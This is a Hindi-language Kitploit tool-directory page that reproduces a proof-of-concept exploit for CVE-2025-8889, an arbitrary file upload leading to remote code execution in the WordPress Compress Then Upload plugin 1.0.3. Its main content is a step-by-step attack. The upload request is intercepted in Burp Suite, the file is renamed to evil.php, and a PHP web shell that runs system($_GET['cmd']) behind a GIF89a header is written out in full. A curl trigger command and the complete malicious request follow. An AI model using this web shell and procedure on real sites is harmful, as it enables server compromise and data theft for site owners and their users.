Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-8889 — CVE-2025-8889 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: वर्डप्रेस Compress Then Upload प्लगइन 1.0.3 में मनमाना फ़ाइल अपलोड से RCE तक। MIME मान्यता को बायपास करने और PHP कोड निष्पादित करने के लिए Burp Suite का उपयोग करके चरण-दर-चरण PoC शामिल है। | Kitploit
उपकरण/GitHubGitHub/siberkampus/cve-2025-8889
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubsiberkampus/cve-2025-8889

CVE-2025-8889

CVE-2025-8889 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: वर्डप्रेस Compress Then Upload प्लगइन 1.0.3 में मनमाना फ़ाइल अपलोड से RCE तक। MIME मान्यता को बायपास करने और PHP कोड निष्पादित करने के लिए Burp Suite का उपयोग करके चरण-दर-चरण PoC शामिल है।

रिपॉजिटरी देखें
131 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

शोषण शीर्षक: WordPress Compress Then Upload Plugin 1.0.3 मनमाना फ़ाइल अपलोड से RCE

दिनांक: 2025-07-23
शोषण लेखक: Muhammed Çelik
विक्रेता होमपेज: https://wordpress.com/plugins/compress-then-upload
सॉफ़्टवेयर लिंक: https://downloads.wordpress.org/plugin/compress-then-upload.latest-stable.zip
संस्करण: 1.0.3
परीक्षित: Debian, WordPress 6.8.1, Apache 2.4.62, PHP 8.2.28
CVE: CVE-2025-8889

कमज़ोरी

"Compress Then Upload Images" WordPress प्लगइन अपने मीडिया अपलोड इंटरफ़ेस के माध्यम से इमेज अपलोड के दौरान फ़ाइल एक्सटेंशन और MIME प्रकारों को ठीक से मान्य नहीं करता है। यद्यपि क्लाइंट-साइड मान्यताएँ मौजूद हैं, उन्हें अपलोड अनुरोध को इंटरसेप्ट और संशोधित करके बायपास किया जा सकता है।

मीडिया अपलोड अनुमतियों (लेखक भूमिका या उच्चतर) वाला एक प्रमाणित उपयोगकर्ता इसका शोषण कर सकता है:

  1. पहले एक हानिरहित इमेज फ़ाइल अपलोड करना
  2. अपलोड अनुरोध को इंटरसेप्ट करना (जैसे, Burp Suite के माध्यम से)
  3. अपलोड की गई फ़ाइल का नाम एक्सटेंशन और फ़ाइल सामग्री को दुर्भावनापूर्ण PHP कोड युक्त करने के लिए संशोधित करना
  4. कमज़ोर सर्वर-साइड जाँचों को बायपास करने के लिए मूल MIME प्रकार हेडर (image/jpeg) बनाए रखना
  5. परिणामस्वरूप सर्वर पर मनमाना PHP कोड निष्पादन (रिमोट कोड एक्ज़ीक्यूशन, RCE)

PoC

चरण 1: एक सामान्य इमेज फ़ाइल तैयार करें एक सामान्य इमेज फ़ाइल बनाएँ, जैसे, (कोई भी मान्य JPG फ़ाइल)।


regular.jpg

चरण 2: WordPress एडमिन पैनल के माध्यम से सामान्य इमेज अपलोड करें

  • कम से कम लेखक विशेषाधिकार वाले उपयोगकर्ता के साथ WordPress एडमिन पैनल में लॉगिन करें।
  • मीडिया > Compress Then Upload Images (प्लगइन का अपलोड इंटरफ़ेस) पर जाएँ।
  • regular.jpg सामान्य रूप से अपलोड करें।

चरण 3: Burp Suite के साथ अपलोड अनुरोध को इंटरसेप्ट और संशोधित करें

  • अपलोड प्रगति पर होने पर, Burp Suite में HTTP मल्टीपार्ट अनुरोध को इंटरसेप्ट करें।
  • अनुरोध को संशोधित करें:
    • filename="regular.jpg" → filename="evil.php" बदलें
    • फ़ाइल सामग्री को PHP वेब शेल कोड से बदलें:
root@kitploit:~
GIF89a;
<?php
    if (isset($_GET['cmd'])) {
        system($_GET['cmd']);
    }
?>

नोट: GIF89a; कमज़ोर इमेज सत्यापन को बायपास करने के लिए एक मान्य GIF हेडर का अनुकरण करता है। Content-Type को image/jpeg के रूप में रखें।

संशोधित अनुरोध को सर्वर पर अग्रेषित करें।

चरण 4: अपलोड किए गए वेब शेल को ट्रिगर करें

यदि अपलोड सफल होता है, तो PHP फ़ाइल अपलोड्स निर्देशिका में सहेजी जाएगी, उदाहरण: http://target-site.com/wp-content/uploads/2025/07/evil.php

ब्राउज़र या curl के माध्यम से एक्सेस करें:

root@kitploit:~
curl "http://target-site.com/wp-content/uploads/2025/07/evil.php?cmd=id"

उदाहरण दुर्भावनापूर्ण अपलोड अनुरोध (Burp Suite)

root@kitploit:~
POST /index.php?rest_route=/wpctu-api/v1/upload HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/plain, */*
...
Content-Disposition: form-data; name="file"; filename="evil.php"
Content-Type: image/jpeg

GIF89a;
<?php
    if (isset($_GET['cmd'])) {
        system($_GET['cmd']);
    }
?>
टूल डाउनलोड करें